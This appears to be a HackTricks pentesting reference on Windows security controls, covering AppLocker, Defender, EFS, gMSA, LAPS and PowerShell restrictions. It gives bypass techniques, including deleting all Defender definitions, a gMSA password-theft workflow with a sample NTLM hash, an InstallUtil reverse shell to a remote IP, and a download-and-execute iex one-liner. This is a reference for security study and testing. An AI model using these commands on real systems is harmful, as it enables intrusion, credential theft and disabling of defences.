overview.md (18573B)
1 --- 2 title: "Windows Security Controls" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/authentication-credentials-uac-and-efs/README.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/authentication-credentials-uac-and-efs/README.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: true 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Windows Security Controls 14 15 ## AppLocker Policy 16 17 An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system. The goal is to protect the environment from harmful malware and unapproved software that does not align with the specific business needs of an organization. 18 19 [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's **application whitelisting solution** and gives system administrators control over **which applications and files users can run**. It provides **granular control** over executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers.\ 20 It is common for organizations to **block cmd.exe and PowerShell.exe** and write access to certain directories, **but this can all be bypassed**. 21 22 ### Check 23 24 Check which files/extensions are blacklisted/whitelisted: 25 26 ```bash 27 Get-ApplockerPolicy -Effective -xml 28 29 Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections 30 31 $a = Get-ApplockerPolicy -effective 32 $a.rulecollections 33 ``` 34 35 This registry path contains the configurations and policies applied by AppLocker, providing a way to review the current set of rules enforced on the system: 36 37 - `HKLM\Software\Policies\Microsoft\Windows\SrpV2` 38 39 ### Bypass 40 41 - Useful **Writable folders** to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside `C:\Windows\System32` or `C:\Windows` there are **writable folders** you can use to **bypass this**. 42 43 ```text 44 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys 45 C:\Windows\System32\spool\drivers\color 46 C:\Windows\Tasks 47 C:\windows\tracing 48 ``` 49 50 - Commonly **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker. 51 - **Poorly written rules could also be bypassed** 52 - For example, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, you can create a **folder called `allowed`** anywhere and it will be allowed. 53 - Organizations also often focus on **blocking the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, but forget about the **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) such as `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` or `PowerShell_ISE.exe`. 54 - **DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using **DLLs as backdoors will help bypassing AppLocker**. 55 - You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[4]](#references)</sup> 56 57 ## Credentials Storage 58 59 ### Security Accounts Manager (SAM) 60 61 Local credentials are present in this file, the passwords are hashed. 62 63 ### Local Security Authority (LSA) - LSASS 64 65 The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\ 66 **LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\ 67 LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user. 68 69 The **credentials** are **saved** inside the **process LSASS**: Kerberos tickets, hashes NT and LM, easily decrypted passwords. 70 71 ### LSA secrets 72 73 LSA could save in disk some credentials: 74 75 - Password of the computer account of the Active Directory (unreachable domain controller). 76 - Passwords of the accounts of Windows services 77 - Passwords for scheduled tasks 78 - More (password of IIS applications...) 79 80 ### NTDS.dit 81 82 It is the database of the Active Directory. It is only present in Domain Controllers. 83 84 ## Defender 85 86 [**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) is an Antivirus that is available in Windows 10 and Windows 11, and in versions of Windows Server. It **blocks** common pentesting tools such as **`WinPEAS`**. However, there are ways to **bypass these protections**. 87 88 ### Check 89 90 To check the **status** of **Defender** you can execute the PS cmdlet **`Get-MpComputerStatus`** (check the value of **`RealTimeProtectionEnabled`** to know if it's active): 91 92 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus 93 94 [...] 95 AntispywareEnabled : True 96 AntispywareSignatureAge : 1 97 AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM 98 AntispywareSignatureVersion : 1.323.392.0 99 AntivirusEnabled : True 100 [...] 101 NISEnabled : False 102 NISEngineVersion : 0.0.0.0 103 [...] 104 <strong>RealTimeProtectionEnabled : True 105 </strong>RealTimeScanDirection : 0 106 PSComputerName : 107 </code></pre> 108 109 To enumerate it you could also run: 110 111 ```bash 112 WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List 113 wmic /namespace:\\root\securitycenter2 path antivirusproduct 114 sc query windefend 115 116 #Delete all rules of Defender (useful for machines without internet access) 117 "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All 118 ``` 119 120 ## Encrypted File System (EFS) 121 122 EFS secures files through encryption, utilizing a **symmetric key** known as the **File Encryption Key (FEK)**. This key is encrypted with the user's **public key** and stored within the encrypted file's $EFS **alternative data stream**. When decryption is needed, the corresponding **private key** of the user's digital certificate is used to decrypt the FEK from the $EFS stream. More details can be found [here](https://en.wikipedia.org/wiki/Encrypting_File_System). 123 124 **Decryption scenarios without user initiation** include: 125 126 - When files or folders are moved to a non-EFS file system, like [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), they are automatically decrypted. 127 - Encrypted files sent over the network via SMB/CIFS protocol are decrypted prior to transmission. 128 129 This encryption method allows **transparent access** to encrypted files for the owner. However, simply changing the owner's password and logging in will not permit decryption. 130 131 **Key Takeaways**: 132 133 - EFS uses a symmetric FEK, encrypted with the user's public key. 134 - Decryption employs the user's private key to access the FEK. 135 - Automatic decryption occurs under specific conditions, like copying to FAT32 or network transmission. 136 - Encrypted files are accessible to the owner without additional steps. 137 138 ### Check EFS info 139 140 Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect` 141 142 Check **who** has **access** to the file using cipher /c \<file>\ 143 You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files 144 145 ### Decrypting EFS files 146 147 #### Being Authority System 148 149 This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user. 150 151 #### Knowing the user's password 152 153 Mimikatz documents how to import the user's certificate/private key material and decrypt EFS-protected files when the password is known.<sup>[[6]](#references)</sup> 154 155 ## Group Managed Service Accounts (gMSA) 156 157 Microsoft developed **Group Managed Service Accounts (gMSA)** to simplify the management of service accounts in IT infrastructures. Unlike traditional service accounts that often have the "**Password never expire**" setting enabled, gMSAs offer a more secure and manageable solution: 158 159 - **Automatic Password Management**: gMSAs use a complex, 240-character password that automatically changes according to domain or computer policy. This process is handled by Microsoft's Key Distribution Service (KDC), eliminating the need for manual password updates. 160 - **Enhanced Security**: These accounts are immune to lockouts and cannot be used for interactive logins, enhancing their security. 161 - **Multiple Host Support**: gMSAs can be shared across multiple hosts, making them ideal for services running on multiple servers. 162 - **Scheduled Task Capability**: Unlike managed service accounts, gMSAs support running scheduled tasks. 163 - **Simplified SPN Management**: The system automatically updates the Service Principal Name (SPN) when there are changes to the computer's sAMaccount details or DNS name, simplifying SPN management. 164 165 The passwords for gMSAs are stored in the LDAP property _**msDS-ManagedPassword**_ and are automatically reset every 30 days by Domain Controllers (DCs). This password, an encrypted data blob known as [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), can only be retrieved by authorized administrators and the servers on which the gMSAs are installed, ensuring a secure environment. To access this information, a secured connection such as LDAPS is required, or the connection must be authenticated with 'Sealing & Secure'. 166 167 <sup>[[1]](#references)</sup> 168 169 You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**<sup>[[2]](#references)</sup> 170 171 ```text 172 /GMSAPasswordReader --AccountName jkohler 173 ``` 174 175 [**Find more information in the archived original research**](https://web.archive.org/web/20200724233424/https://cube0x0.github.io/Relaying-for-gMSA/).<sup>[[1]](#references)</sup> 176 177 The same research explains how an **NTLM relay attack** can obtain a **gMSA password** when the relayed principal is authorized to read `msDS-ManagedPassword`.<sup>[[1]](#references)</sup> 178 179 ### Abusing ACL chaining to read gMSA managed password (GenericAll -> ReadGMSAPassword) 180 181 In many environments, low-privileged users can pivot to gMSA secrets without DC compromise by abusing misconfigured object ACLs:<sup>[[3]](#references)</sup> 182 183 - A group you can control (e.g., via GenericAll/GenericWrite) is granted `ReadGMSAPassword` over a gMSA. 184 - By adding yourself to that group, you inherit the right to read the gMSA’s `msDS-ManagedPassword` blob over LDAP and derive usable NTLM credentials. 185 186 Typical workflow: 187 188 1) Discover the path with BloodHound and mark your foothold principals as Owned. Look for edges like: 189 - GroupA GenericAll -> GroupB; GroupB ReadGMSAPassword -> gMSA 190 191 2) Add yourself to the intermediate group you control (example with bloodyAD): 192 193 ```bash 194 bloodyAD --host <DC.FQDN> -d <domain> -u <user> -p <pass> add groupMember <GroupWithReadGmsa> <user> 195 ``` 196 197 3) Read the gMSA managed password via LDAP and derive the NTLM hash. NetExec automates the extraction of `msDS-ManagedPassword` and conversion to NTLM: 198 199 ```bash 200 # Shows PrincipalsAllowedToReadPassword and computes NTLM automatically 201 netexec ldap <DC.FQDN> -u <user> -p <pass> --gmsa 202 # Account: mgtsvc$ NTLM: edac7f05cded0b410232b7466ec47d6f 203 ``` 204 205 4) Authenticate as the gMSA using the NTLM hash (no plaintext needed). If the account is in Remote Management Users, WinRM will work directly: 206 207 ```bash 208 # SMB / WinRM as the gMSA using the NT hash 209 netexec smb <DC.FQDN> -u 'mgtsvc$' -H <NTLM> 210 netexec winrm <DC.FQDN> -u 'mgtsvc$' -H <NTLM> 211 ``` 212 213 Notes: 214 - LDAP reads of `msDS-ManagedPassword` require sealing (e.g., LDAPS/sign+seal). Tools handle this automatically. 215 - gMSAs are often granted local rights like WinRM; validate group membership (e.g., Remote Management Users) to plan lateral movement. 216 - If you only need the blob to compute the NTLM yourself, see MSDS-MANAGEDPASSWORD_BLOB structure. 217 218 219 ## LAPS 220 221 The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), enables the management of local Administrator passwords. These passwords, which are **randomized**, unique, and **regularly changed**, are stored centrally in Active Directory. Access to these passwords is restricted through ACLs to authorized users. With sufficient permissions granted, the ability to read local admin passwords is provided. 222 223 224 [Laps](/hacktricks/windows-hardening/active-directory-methodology/laps) 225 226 ## PS Constrained Language Mode 227 228 PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **locks down many of the features** needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows, PowerShell classes, and more. 229 230 ### **Check** 231 232 ```bash 233 $ExecutionContext.SessionState.LanguageMode 234 #Values could be: FullLanguage or ConstrainedLanguage 235 ``` 236 237 ### Bypass 238 239 ```bash 240 #Easy bypass 241 Powershell -version 2 242 ``` 243 244 On current Windows versions that bypass no longer works, but you can use [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\ 245 **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**. 246 247 #### Direct bypass: 248 249 ```bash 250 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe 251 ``` 252 253 #### Reverse shell: 254 255 ```bash 256 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe 257 ``` 258 259 You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).<sup>[[4]](#references)</sup> 260 261 ## PS Execution Policy 262 263 By default it is set to **restricted.** Main ways to bypass this policy: 264 265 ```bash 266 1º Just copy and paste inside the interactive PS console 267 2º Read en Exec 268 Get-Content .runme.ps1 | PowerShell.exe -noprofile - 269 3º Read and Exec 270 Get-Content .runme.ps1 | Invoke-Expression 271 4º Use other execution policy 272 PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 273 5º Change users execution policy 274 Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted 275 6º Change execution policy for this session 276 Set-ExecutionPolicy Bypass -Scope Process 277 7º Download and execute: 278 powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')" 279 8º Use command switch 280 Powershell -command "Write-Host 'My voice is my passport, verify me.'" 281 9º Use EncodeCommand 282 $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand 283 ``` 284 285 More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)<sup>[[5]](#references)</sup> 286 287 ## Security Support Provider Interface (SSPI) 288 289 Is the API that can be use to authenticate users. 290 291 SSPI selects an appropriate authentication protocol for two communicating machines, preferring Kerberos when available. These protocols are implemented by Security Support Providers (SSPs), which are installed as DLLs on Windows; both peers must support the negotiated provider. 292 293 ### Main SSPs 294 295 - **Kerberos**: The preferred one 296 - %windir%\Windows\System32\kerberos.dll 297 - **NTLMv1** and **NTLMv2**: Compatibility reasons 298 - %windir%\Windows\System32\msv1_0.dll 299 - **Digest**: Web servers and LDAP, password in form of a MD5 hash 300 - %windir%\Windows\System32\Wdigest.dll 301 - **Schannel**: SSL and TLS 302 - %windir%\Windows\System32\Schannel.dll 303 - **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one) 304 - %windir%\Windows\System32\lsasrv.dll 305 306 #### The negotiation could offer several methods or only one. 307 308 ## UAC - User Account Control 309 310 [User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. 311 312 313 [Uac User Account Control](/hacktricks/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control) 314 315 ## References 316 317 - [1] [Relaying for gMSA – cube0x0 (Internet Archive)](https://web.archive.org/web/20200724233424/https://cube0x0.github.io/Relaying-for-gMSA/) 318 - [2] [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) 319 - [3] [HTB Sendai – 0xdf: gMSA via rights chaining to WinRM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html) 320 - [4] [darthsidious – Bypassing AppLocker and PowerShell Constrained Language Mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode) 321 - [5] [NetSPI – 15 Ways to Bypass the PowerShell Execution Policy](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 322 - [6] [howto ~ decrypt EFS files](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)